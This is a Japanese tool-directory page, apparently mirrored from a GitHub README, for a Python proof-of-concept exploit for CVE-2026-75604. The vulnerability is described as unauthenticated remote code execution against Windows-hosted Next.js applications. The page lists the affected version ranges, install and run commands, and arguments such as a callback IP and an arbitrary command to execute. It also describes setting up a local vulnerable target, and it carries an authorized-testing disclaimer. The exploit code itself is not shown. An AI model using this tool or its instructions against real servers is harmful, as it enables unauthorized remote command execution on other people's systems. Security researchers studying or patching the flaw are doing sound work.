Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-75604-poc — CVE-2026-75604の概念実証エクスプロイト。Windows上でホストされているNext.jsアプリにおける認証不要のリモートコード実行であり、コールバックベースのコマンド実行とローカルターゲットのセットアップを備えています。 | Kitploit
ツール/GitHubGitHub/rafabd1/cve-2026-75604-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセストロイの木馬
GitHubrafabd1/cve-2026-75604-poc

CVE-2026-75604-poc

CVE-2026-75604の概念実証エクスプロイト。Windows上でホストされているNext.jsアプリにおける認証不要のリモートコード実行であり、コールバックベースのコマンド実行とローカルターゲットのセットアップを備えています。

リポジトリを見る
341日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-75604 RCE PoC

CVE-2026-75604 のPython概念実証コードです。これは、Cache Componentsを使用せずにPages RouterとApp Routerの両方を使用するWindowsホストのNext.jsアプリケーションにおける、認証不要のリモートコマンド実行の脆弱性です。

デモ

CVE-2026-75604 RCE proof of concept

要件

  • Next.js >=13.4 <15.5.24 または >=16.0 <16.3.3
  • ネイティブWindowsサーバー
  • Cache Componentsを使用しないPages RouterとApp Router
  • 動的なPages ISRルートと動的なキャッシュされたAppルートを備えたデフォルトのファイルシステムキャッシュ
  • 互換性のあるクロージャバインドされたServer Action
  • Python 3.9以上と、ターゲットから到達可能なコールバックアドレス

[email protected] で検証済みです。

root@kitploit:~
python -m pip install -r requirements.txt

使用方法

root@kitploit:~
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP --pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE --app-cache-path /PATH/TO/APP_CACHE_INSTANCE

Server Actionのパスはデフォルトで / です。フォームに複数のフィールドがある場合は --action-field を使用してください。

必須引数:

  • --target URL: Next.jsアプリケーションのベースURL
  • --callback-ip ADDRESS: ターゲットから到達可能なIPv4アドレス
  • --pages-cache-path PATH: 既存の動的なPages Router ISRページ
  • --app-cache-path PATH: ファイルシステムキャッシュによってバックアップされた既存の動的なApp Routerページ

オプション引数:

  • --command COMMAND: 実行するコマンド。デフォルトは whoami
  • --action-path PATH: 互換性のあるServer Actionを含むApp Routerページ。デフォルトは /
  • --action-field NAME: アクションによって消費されるフォームフィールド。曖昧でない場合は自動的に検出されます
  • --callback-port PORT: コールバックポート。デフォルトは 4331
  • --listen-address ADDRESS: ローカルコールバックのバインドアドレス。デフォルトは 0.0.0.0
  • --timeout SECONDS: リクエストとコールバックのタイムアウト。デフォルトは 20
  • --insecure: TLS証明書の検証を無効にします

ローカルターゲット

オプションの target/ アプリケーションは [email protected] を固定し、標準のNext.js本番サーバーを使用します:

root@kitploit:~
cd target
npm ci
npm run build
npm start

別のターミナルでPoCを実行します:

root@kitploit:~
python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 --pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed

オプションのターゲットは、必要なルートと / 上の互換性のあるServer Actionを提供します。

免責事項

このPoCは、教育目的、セキュリティ研究、および許可されたテストのみを目的として提供されています。所有しているシステム、または明示的にテスト許可を得たシステムでのみ使用してください。

クレジット

evolutionstorm にクレジットを提供します。

このPoCは、公開アドバイザリとNext.jsパッチから独立して再構築されました。

ツールをダウンロード